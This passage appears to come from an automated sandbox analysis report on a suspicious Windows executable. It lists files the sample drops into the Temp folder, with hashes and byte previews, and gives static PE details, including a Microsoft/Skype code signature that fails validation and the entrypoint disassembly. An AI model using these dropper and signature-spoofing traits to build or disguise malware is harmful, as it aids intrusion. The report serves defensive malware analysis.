                                                                                Encrypted:false
                                                                                SSDEEP:768:I2tR/i01A/ES4KY2lfwMwstd7t+Jv/awuUw1Q37iehoxQeU3ecm:I2tR/i0027EM/awuUwU7KxQez
                                                                                MD5:B29471EA15F20AD6E7FA74902CA46141
                                                                                SHA1:68D24848AF29636CE283EEE0E702083850274F2C
                                                                                SHA-256:56143152CF4EF32820BBF2C358EBAF3FAAAFE857F802E04D11F7A6C34A9DF3D1
                                                                                SHA-512:A6002DF3D1C9C8512ED2115487A268E3F63127EFDF09E2F02538AA723B6B5E7E0BB6638C1519EEF6756BF8F0DAE6A45CC73A4AD1A2ED22C24DA3081BC8F6B758
                                                                                Malicious:false
                                                                                Preview:.E...u.+u...P.....I...........0....@.L...`........y....L....`.}........3.f.E.........T....U..u..........k.........M.f9.r...}..M..M.....M...y..U..3.].%.....].E......#.].#..]...........u.f;...I...f;...@........f;...2.....?..f;.w..]..7...f..u$F.E......u.u..}..u..}..u.3.f.E......f..u.F.A......u.u.9Y.u.9.t.j...U._.E..}..}...~X.u.4F.A..E.....E..E..M..].......M..J.;J.r.;M.s.3.@...E..J...t.f...m.....O.....M..}..E....@O.E..}......u..U.......}.U.f..~;..x2.E.................U..E........}......U..U.f....f...i.......f..y].].........E....E..t.C.M......M..m..E..E...........M..U.E.}.u.j...U.[t.3.f..Af..f.E.}...f.E.....f;.w.............u@.E...u4.E.]...u f.E......].f;.u.f.U.F..f@f.E...@.E.M...@.E.M..U......f;.r.3..].f9E..]....H%..........E..:f.E..u.f.E.E.E.M.f.u.. 3.f9E....H%..........E.].].U..u..........E...M.U.u.....0.....3.C.#..........j.............j....[.}..E.f.G...f...W..w..M._^3.[.4.....]..B...B.V.B...B...B...B...B.N.B...B...B...B.f.B.;.P.L.u.......U

                                                                                C:\Users\user\AppData\Local\Temp\Late

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):57344
                                                                                Entropy (8bit):6.602211769609589
                                                                                Encrypted:false
                                                                                SSDEEP:1536:6PiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIx:6PNGR5yiPlcQ4Nvof
                                                                                MD5:3D15FB2B58D83B5627686D28477FF8EC
                                                                                SHA1:EF15E5C0A5D858E9EE8361F89B276EF71E1ABC5B
                                                                                SHA-256:60A85EA86F3BBB20466842F0937BCB4794799AFE9766CD46881C9CFE6AB0BBF5
                                                                                SHA-512:1D3DF4FD73727CEFECF9B22B59A2F7E9A17DD7478F583F4CF019280F6A9B4A4681136ABBF7B6F114A7C9ED38221294F9F13255B00ECECC91A3796D1F3060C249
                                                                                Malicious:false
                                                                                Preview:...C...Cf.;w.......E.0.........f.>vu.......=....|.=.........=...........u....W....YY........jwY..F..4Ff9.t.N.3...............f.~....u...._P..l....}....b.....p..S....u.......W.....YY....>....M.jw..A...AX.M.f9...y...3.@.....jHXf;...U...j;Xf;...I...j.Zf;...........A......#.#................E.3...;.s.f9Y.t..z..M..9...z..E..8.B....B.E........;.......3...v...t.B......t......;...v.....E....;.s.f9Y.t..N..y8..t.Q.i....~..F........u..N...?...F...>...h....j.P.4.....I..4...X.I.....E..V......F...#....G.P.p......Y.w..G...1....p.P......Y..u.^.E.P......M..S........j..M..:...f98..7...j._.........W.M........0..?......j..M......j\Yf9.......j.^...vVV.M.....f.8UuGj..M.....f.8Nu7j..M.....f.8Cu'j..M....j\Yf9.u.h8.K..M.....j.^....h,.K..M.......hL.K..M.....j.^3.G.\...u.j..M..i...j\Yf9.t.h..K..M.......4....q...V.M..q...j\Yf9.u.O..t.V.M..[....M....P...F;.r..<...........E.P.M......M.......q.Q......u.^....w......Y.G.._....V.T...G........S......f.8[.......G...HP..

                                                                                C:\Users\user\AppData\Local\Temp\Practitioner

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):50176
                                                                                Entropy (8bit):6.228928005255668
                                                                                Encrypted:false
                                                                                SSDEEP:768:GRGNul1Eovu86eV3QKYwlrRX9Qywqp9sK1xhNGE0psu0nM8+aZKA:YkU5uG3xYwBMK1zN90psu0nMOKA
                                                                                MD5:2FB44468B5D3C2A8E8362EA35A9EAD7F
                                                                                SHA1:33A34215295451FB8C603071F15C1FC38DEB7BF3
                                                                                SHA-256:1016415BD80A9943C3C103AA74BB3B6C3FEAE31437B97B52EEAE8B6A765280A5
                                                                                SHA-512:185E9DD02598F16E3E19E2802292EF6C23FED7E39AFA5626E854081434E4757AA47A9DC6FF9609D3ED470D5C38215EB8D2501ED54EA9166C90228AD13D5DF9FD
                                                                                Malicious:false
                                                                                Preview:)L...I....)L.N.F....*L........*L........*L........*L........*L.....*L...I... *L.b.F...$*L.......(*L.......,*L.......0*L.......4*L....8*L...I...D*L.v.F...H*L.......L*L.......P*L.......T*L.......X*L....\*L.D.I...h*L...F...l*L.......p*L.......t*L.......x*L.......|*L.....*L.p.I....*L...F....*L........*L........*L........*L........*L.....*L...I....*L...F....*L........*L........*L........*L........*L.....*L...I....*L...@....*L........*L........*L........*L........*L.....*L...I....*L...F....*L........+L........+L........+L........+L.....+L...I....+L...F... +L.......$+L.......(+L.......,+L.......0+L....4+L.,.I...@+L.H.F...D+L.......H+L.......L+L.......P+L.......T+L....X+L.D.I...d+L...F...h+L.......l+L.......p+L.......t+L.......x+L....|+L.d.I....+L.Q.G....+L........+L........+L........+L........+L.....+L...I....+L...G....+L........+L........+L........+L........+L.....+L...I....+L...G....+L........+L........+L........+L........+L.....+L...I....+L.8.G....+L........+L........,L........,L........,L

                                                                                C:\Users\user\AppData\Local\Temp\Pregnant

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):4.161383143104201
                                                                                Encrypted:false
                                                                                SSDEEP:384:+fU84444QnoooooooooooooooooooooooYooootooooooooooooooYoooooooooj:+SF
                                                                                MD5:8C7FF59E12229F9A378E1E87E0F9990A
                                                                                SHA1:E97332E12F5AE2238D329D9C1119856C7A90A741
                                                                                SHA-256:012804834CDA2559DBDFE72599126689D71901666EDE8E5D3830B0E3FF72EB47
                                                                                SHA-512:AB373CFA909A5984F901FFC6B45EED2243074FE053C580094750B4A689A84E5280393E757F362F346C5C3F0887C24300E9F5A9D08347CB0EAD60AB594A054E06
                                                                                Malicious:false
                                                                                Preview:r.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!...j.j.j.j.r.r.r.r.!.z.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r....................................................................... . .!. . .!. . .". .!.r.r.$.$.$.$.$.$.$.$.$.$.r.r.r.r.r.r.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.

                                                                                C:\Users\user\AppData\Local\Temp\Queries

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):59392
                                                                                Entropy (8bit):6.485524505384207
                                                                                Encrypted:false
                                                                                SSDEEP:1536:4q5YdzhtD4RLGki26nWRgRPaM60w9/5Sh4ztrgWVl:4qi/x4Rqf21Rgat0g/bZF
                                                                                MD5:A9F1DF9C9ADF28A265BF5D63EE439A9A
                                                                                SHA1:BF6F9E32E63DEC76BDFBF087BF470C9C7E6E44D3
                                                                                SHA-256:D2AF659E6B06C7551951C547F9EE9F1DEF04EDB77FECF2429114A337DEA14168
                                                                                SHA-512:74FBA89644A30B31079DA38072BED641AA92E637BF07CD2FF38C473E0C37D86CF2927E33601B0BFBE8CB1D3F8A5F7EED4BF695A1911403CA78DCBE84F72214C4
                                                                                Malicious:false
                                                                                Preview:.3.C.^....f..t"P.....Y..t.......f..u...F)...^..._^3.[]...U..E.VW.@..0......u........)...>3._.F.....^]...U..E.VW.@..0......u........(...>3._.F.....^]...U..E.SVW.@..0...:(...F..u...8.(...&.3.C.^....f..t"P....I...t.......f..u...(...^..._^3.[]...U..E.SVW.@..0....'...F..u...E..X..P(..3..F......>..t..M.W.O...f...r*....t.G;.r... (..3.@.F..._^3.[]...U..E.SVW.@..0...q'...F..u...8..'...&.3.C.^....f..t"P....I...t.......f..u...'...^..._^3.[]...U..E.SVW.@..0....'...F..u...8.'...&.3.C.^....f..t"P.2...Y..t.......f..u...]'...^..._^3.[]...U.....M.SVW.....]..C..0...&...F..p..C..H..)......x ;.~....C..0...}&..Wj..v..M......M..E.P.h(...M......_^3.[..]...U..E.VW.@..0...<&...F..u...x..&...>3._.F.....^]...U.....E.V.@..0....&...N....E..A..E.A..E..A..M..E....N....u..u.....I..M..E.P..'...M..@...3.^..]...U......4SVW...L$0.q....]..C..0...%...F..L$ .D$..p..u....C..p....r%...F..D$..C..p.....D.....tt.G(....NxY.D$..\$..H...;K.wGVj.S.L$,.Z....|$..L$ W......O..C.+.+.P..1PS.L$<.3....D$0P.L

                                                                                C:\Users\user\AppData\Local\Temp\Rand

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):202752
                                                                                Entropy (8bit):7.999153251598219
                                                                                Encrypted:true
                                                                                SSDEEP:3072:yZybHmdBTKNHPFi++zERSnlFtRZUDSP0ja7C/UUP02z6PMktPy036c38DWfOTb50:Ydh8PFQ4StqSfIUje6PxWchOhLRVA
                                                                                MD5:AF3FE75F183915ABD7585E5280C8C461
                                                                                SHA1:FAFD76965291C3C64BC6B7E93D4CF73F8FC6F490
                                                                                SHA-256:98773E10FF7BCF174B7C73F1BBD8E47F08E996BA201B2A30AC34897BCEF0F5FD
                                                                                SHA-512:A195027677B858BEBE350C675A7D91651FCDAC4319FDF690DE5AED00F137D06D15F3B3A7C6BDF162E996249FFF070583CE08E4275878CFCABEE69FC28A8904DE
                                                                                Malicious:false
                                                                                Preview:..3.R...E;KE.q.i........h*.|..$....p.......9}.\P.$...8...y....6.W.0.W.{....U..6..Y..y.'....h.4...a6U...y.&.4..r..P..:.../...2.D.Dg).:..T.....E.c...-$.0.qf.P...../.(B..../_/.:.<Z.}u.d.ur\z....._.4..0n...J.v........d~.W5.3....Q......S.f:....Nlcp.~.J..#h.}t...vh#{.OS..3V.8.P%Gr(.S.&8.ja..xAX.mX.NN..I.v]F.#K......O+2.eGq./kC.nR.X.W.d........y.dC..._..D..(N.lf.....2b......G..V?[..CZ0.&.v..n....LhB<.......>..H...8;.\AUj|X...[y.|.ao.1.3.B..8.....j..[.n....^...9...../.O..r.H..E.J.....FmNf.jgN...%..|.,...nv..[|_..d1..ju?.v.#}.W^.p.....8....\..?.E.....c.B.*1..\...5.P5.<J.$xq..U.|V.q.1}.?_.....GG.......v..[.#.XY....a..j.'.|.*eDC....5i..bf.B..^X..R..[...dlR...5!..R..i..GB..:.J.M..N.J.+......[%....@j....M[ .!4....[.=.....sf.L.o]Q*bw.... 3....5.Gg.........e..d..1.\.i.62.D.t..hJ.z...H.46..1T..._Ts}....Uft....W;U... K.;.J_..o.......r..4.w..?6. .D.q.XO[G....y.......m.......R..JB2...w..W..g:..d.'.BK..dCT"/...6...A.2JN`.7..4...en..[...v.J.....V.[.....g

                                                                                C:\Users\user\AppData\Local\Temp\Rescue

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):24576
                                                                                Entropy (8bit):6.451890022070338
                                                                                Encrypted:false
                                                                                SSDEEP:384:JYaqkT/9VBOqoQYIJBCsZ45WOI3i9vKvgU3lvtz78fl/4XETSxh:J3T/QqoWBY5WK9ivg0XWYETGh
                                                                                MD5:EE1F3824CA43A53ADE6A62B2C4D891B1
                                                                                SHA1:E0A7D4742D4E2F003FD98937181E8F638E8CA4F2
                                                                                SHA-256:00401EACD2ABCD9D19C0A5196260F5AC627FEDB8375B932D94A35A26BEF34C1D
                                                                                SHA-512:F511A4DC203663993464C9C8E4424686A0446F2CC60598911F1A053D4725D763513B21CC6494458327A7119EB465163F4CDEA20038AA3765DD4543880FB949AB
                                                                                Malicious:false
                                                                                Preview:.M.Q.@.....?..P......u......R=..3..>@.F.3..M..6..._..^[..]...U......,SV.u.W3...|$ .~..v..F..H..9|...D$ .N....{..t.PWW.$....~................Z...j.....1.......H...j.....1..3..j.Z..|$........Q.......3..t$ .D$.Y..........j.Pj.j.S..0...........;...N.j..t$....D$0.A..D$4.A..D$8.A.j.j.S...D$H.0........>.....D$.P.D$.P.D$.P.D$.P.D$4P.D$<P......ti.|$.....t.....|$..t.....|$..t....f.D$$.L$(f.G.f.w.......D$....@.D$.;D$...7....t$..|$..t$ WV....V.N...Y.<.t$..B....u.Y...;...&..L$(.F......~......u....|;...F......>_^3.[..]...U..SV.u....W.]..~....v..F..H..=......v..N..I..=...E....v..N..I..Mz....3..V.P.u..J..2S.v=..P...n=..P....u.......:...>3._.F.....^[]...U..QSVW.}.3..E......]..w...t..G....#=...E....v..O..I...=......v..O..I..y.....E.PS.u...._^3.[..]...U....SV.u..M.W.~......].3..M.....E......E..H:...#..C........v..F..H..<...E....v..F..H..y.........=y...E....v!.F..X..{..ut...m9...s..M.......]....v..F..H..C<...E....v..F..H..0<..........N....{<...E.QQ..$P.u..E..u.PW.........9...C......

                                                                                C:\Users\user\AppData\Local\Temp\Ro

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):6.183862240660329
                                                                                Encrypted:false
                                                                                SSDEEP:768:UGcjXB2SCursGHv7mlHW7nIhp/lNVi6dFiwcq:7ox2S3hPt8gNq
                                                                                MD5:79DFDEEA6C3EBE8AA05A3B5B361C79FB
                                                                                SHA1:5EEFAE1F383C753B0C18FF05CA3588FB9D6CC277
                                                                                SHA-256:56FF0739CEF74A4ABD0635950F07435B627E384495737F5B7285FB95F91E2DDC
                                                                                SHA-512:9CB0B22B332B03B0F2CE6E0F6671084EA39E64235313E8F8A00149D459F3CAA8B8BCA362708854C423E5FA6FFE762B19611EC05A9F57DEA62568E526534F7B68
                                                                                Malicious:false
                                                                                Preview:.F..A..F......A..F....U..E...t.......]...j.X..Vj....^...Y..t........F.^.3...U..V..;u.t..u........^]...V..F....F..8.u..6.....v.....YY^.U..E.SV....P.W..t..X..L..............3._..^[]...U..VW.}.........E....M...4Af..Zv.f..ar.f..zw.V........E.....f..As...f..0......f.._t...>....w..7..|.I.W......E...x.f.. u/j..u........E..._^].......L..7...P..E...x2j...f..,t.f..)t.f...t.f..=t.f..(t.f..]t.f..t..,....M.j4.(....M.W......f..9..8....T...U..QQ.M.SV.u.Wj0[..j9Zj._f9<A.......}..........M..U.f9.Q......j..E..[.....A.E.........z.....+........-......../........9.......... .E... t......A@Q........M....U.......q.......-....7.....Y3..f.}.J............;...l...|.;...b...j..u.........>.^..._^[..].....E..).....e.. .......A}.f.}._..Z..........Z.........DQ...xt...X.......]..B...3...j0...QYf;.r%j9Yf;.w.P.B.........M.G.......N.....a......jAYf;..........U.j..w...Y..ts.u...........j..I....E....E..F..&......t.j%[...E........I..........uN.u...j ......7.Z.....Y.....f.}.3u...DA.f;.v.2.............

                                                                                C:\Users\user\AppData\Local\Temp\Suit

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):46080
                                                                                Entropy (8bit):6.569106396798038
                                                                                Encrypted:false
                                                                                SSDEEP:768:brPhISqAbwGpKZrLlmPEp0wpk1dxvhc8cdPpLWtrJADK1c+d9Y9TnzA/o7uGwr9A:bgjGpS2EhkjxvhPc5pLW5N1c+d9YUA
                                                                                MD5:DB5E486C153F5227B3939C9C37189375
                                                                                SHA1:B1B6D1E88DD1D7622DE324EE9265D2AE743A6D92
                                                                                SHA-256:779F46FC17C935261963CD5B0686FEE09B75937894D0818C77B04F7570CABA63
                                                                                SHA-512:5C76650A10BBDF64E52762F1285915130832228192C9AAC2801CB8391B897306D7648FD58145D88DA2D3E465F4F5FCB17A1BC0FF87E6E0E338388C8FC68D9771
                                                                                Malicious:false
                                                                                Preview:...I..u....t#._...3..>@W.F.....I.P...H..........<...3.@.F..._^3.[]...U..SV..M.W.....3..j.CSW.......j.j.j.....I..E....u7j.....I.P...H....V...j.Sj.W.F................^..........]..{..vJ.C..H........t;j..E..E.....Pj h.....u.....I...t.j.....I.P...H........3.C.j.j.j.W.............T...3......@PPj.W.F.............2....E..F........C..0.......v.j.j.j.W.{.........}....C..p....k....v.j.j.j.W.U.........W..._^3.[]...U......T...S.].V..W.C..H.......M.h..I..D$..z....K....y..t.j.j....H.........}...3.y..u..9....Sj.j.W..........u.S........=...t.Sj..j.j.j.W........D$..........D$.....3..|$:f.D$8.j...f....u.S.x...jd.D$`..PS.B.............|$..G.P.....YP.L$ .Z....D$XPS....I..........D$.P.D$<Pj.W.|$,WS....I...\$....u.j.....I.P.{....E.3..x.........@..H.......M.....D$..I..I............t$4.......M..M...3...j.GWS.....WWj.S..........t$<....I.P.L$(.HA...D$HP.L$(.....P.......L$H.....j.Wj.S.d.........t$:....I...........j.j.j.S.G......7.6.......D$..L$$....\$..|$..t$4.|$..t.SWS..tk.L$..hW.....<...YS

                                                                                C:\Users\user\AppData\Local\Temp\Swim

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:SysEx File - Soundcraft
                                                                                Category:dropped
                                                                                Size (bytes):7770
                                                                                Entropy (8bit):7.397161101158993
                                                                                Encrypted:false
                                                                                SSDEEP:192:DQ9xZSVZPNC3noFCe46qd8ZMPVc4VqzfkMQ3o:M9eVndCqT4EwMQ3o
                                                                                MD5:D616AA3C71C33E4AEAE6BE3776B9F1C8
                                                                                SHA1:6FB18D00DA2702637DB9644EB64D6023471C0EB8
                                                                                SHA-256:E99AEED2C33405A2128B1EEB3FCF77C05A45A840B7C2A1CAA5340B92E222B99B
                                                                                SHA-512:A495E112A3D52B3F5FF1199581D16F11A08383C340A79BE793F99DE9F6649D5CD164E4F49D675A2BBF178B477FA64CAFBDBD4770BF4836750C3E2C909F93BCCB
                                                                                Malicious:false
                                                                                Preview:.9.9.9.9.:.:.:.:.:.:.:.: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.; ;$;(;,;0;4;\;l;|;.;.;.;.;.;.;.;.;.;.;$=(=,=0=4=8=<=@=D=H=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>$>,>4><>D>L>T>\>d>l>.>.>......8...x0|0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.4.@.......=.=.=.>.>.>.>..............................................................................................0.....*.H..........0......1.0...`.H.e......0\..+.....7....N0L0...+.....7...0..........010...`.H.e....... .u.......G.a.p...&u.+.2N..Z0.....0...0..|.......H.j.&..?&..Z.0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...160615000000Z..240615000000Z0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G30.."0...*.H.............0..........U#..S...6.).n..B.!...C./.?...G.N...c.I....{...J.mN.@..{.G(...@....K3.,U.!.....N:.Q.........].....5-..\&.{......5A.0.r....:.r...u<.

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.971861442689243
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:file.exe
                                                                                File size:834'674 bytes
                                                                                MD5:1b0fe9739ef19752cb12647b6a4ba97b
                                                                                SHA1:0672bbdf92feea7db8decb5934d921f8c47c3033
                                                                                SHA256:151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479
                                                                                SHA512:1c67f07c38c1a1d360675b8c3214ee7ee107bb4b48dbf8d3c2cd2c2cfbf9205847e77d73979a9ef907d1011ef525245ab295aae651c0f48b4368a73af873319b
                                                                                SSDEEP:12288:1CIFRWBr2HxOV32SGLvstHBe4BhbSJLhpnkfkywNgk30vDe31GnkNXT:1HFsUROVGS6stHBe4rQLofwgy0beTXT
                                                                                TLSH:B90523965EE44093E8762AF01572BA03AF3ABD3608B1814E9517ED2B35237E5D32C773
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                File Icon

                                                                                Icon Hash:ccb2b95b692d8ecc

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x403883
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                Authenticode Signature

                                                                                Signature Valid:false
                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                Error Number:-2146869232
                                                                                Not Before, Not After
                                                                                • 24/04/2024 22:20:26 19/04/2025 22:20:26
                                                                                Subject Chain
                                                                                • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                Version:3
                                                                                Thumbprint MD5:EB1CAB20508C9A21DFB09B2075D0D0F8
                                                                                Thumbprint SHA-1:9AA38CA0F770AB0A44B553BCD390395BCEC61EB4
                                                                                Thumbprint SHA-256:4DCCE58A880975BFD0555B7BB6358D99792AD448E400A3F4E6704EF70D3EBE1B
                                                                                Serial:33000003DE6C778D9215F2E1960000000003DE

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                sub esp, 000002D4h
                                                                                push ebx
                                                                                push ebp
                                                                                push esi
                                                                                push edi
                                                                                push 00000020h
                                                                                xor ebp, ebp
                                                                                pop esi
                                                                                mov dword ptr [esp+18h], ebp
                                                                                mov dword ptr [esp+10h], 00409268h
                                                                                mov dword ptr [esp+14h], ebp
                                                                                call dword ptr [00408030h]
                                                                                push 00008001h
                                                                                call dword ptr [004080B4h]
                                                                                push ebp
                                                                                call dword ptr [004082C0h]
                                                                                push 00000008h
                                                                                mov dword ptr [00472EB8h], eax
                                                                                call 00007FF0953C555Bh
                                                                                push ebp
                                                                                push 000002B4h
                                                                                mov dword ptr [00472DD0h], eax
                                                                                lea eax, dword ptr [esp+38h]
                                                                                push eax
                                                                                push ebp
                                                                                push 00409264h
                                                                                call dword ptr [00408184h]
                                                                                push 0040924Ch
                                                                                push 0046ADC0h
                                                                                call 00007FF0953C523Dh
                                                                                call dword ptr [004080B0h]
                                                                                push eax
                                                                                mov edi, 004C30A0h
                                                                                push edi
                                                                                call 00007FF0953C522Bh
                                                                                push ebp
                                                                                call dword ptr [00408134h]
                                                                                cmp word ptr [004C30A0h], 0022h
                                                                                mov dword ptr [00472DD8h], eax
                                                                                mov eax, edi
                                                                                jne 00007FF0953C2B2Ah
                                                                                push 00000022h
                                                                                pop esi
                                                                                mov eax, 004C30A2h
                                                                                push esi
                                                                                push eax
                                                                                call 00007FF0953C4F01h
                                                                                push eax
                                                                                call dword ptr [00408260h]
                                                                                mov esi, eax
                                                                                mov dword ptr [esp+1Ch], esi
                                                                                jmp 00007FF0953C2BB3h
                                                                                push 00000020h
                                                                                pop ebx
                                                                                cmp ax, bx
                                                                                jne 00007FF0953C2B2Ah
                                                                                add esi, 02h
                                                                                cmp word ptr [esi], bx

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                • [RES] VS2010 SP1 build 40219
                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x3e78.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xc94d20x27a0.ndata
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0xf40000x3e780x4000bc3bf0fbd79703fee0efce09913e88dbFalse0.84759521484375data7.371036255059769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xf80000xf320x100034e72a365b7dd777b23f379d241b91f5False1.002685546875data7.909941577358274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xf41c00x260aPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001129595399466
                                                                                RT_ICON0xf67d00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6771402550091075
                                                                                RT_DIALOG0xf78f80x100dataEnglishUnited States0.5234375
                                                                                RT_DIALOG0xf79f80x11cdataEnglishUnited States0.6056338028169014
                                                                                RT_DIALOG0xf7b180x60dataEnglishUnited States0.7291666666666666
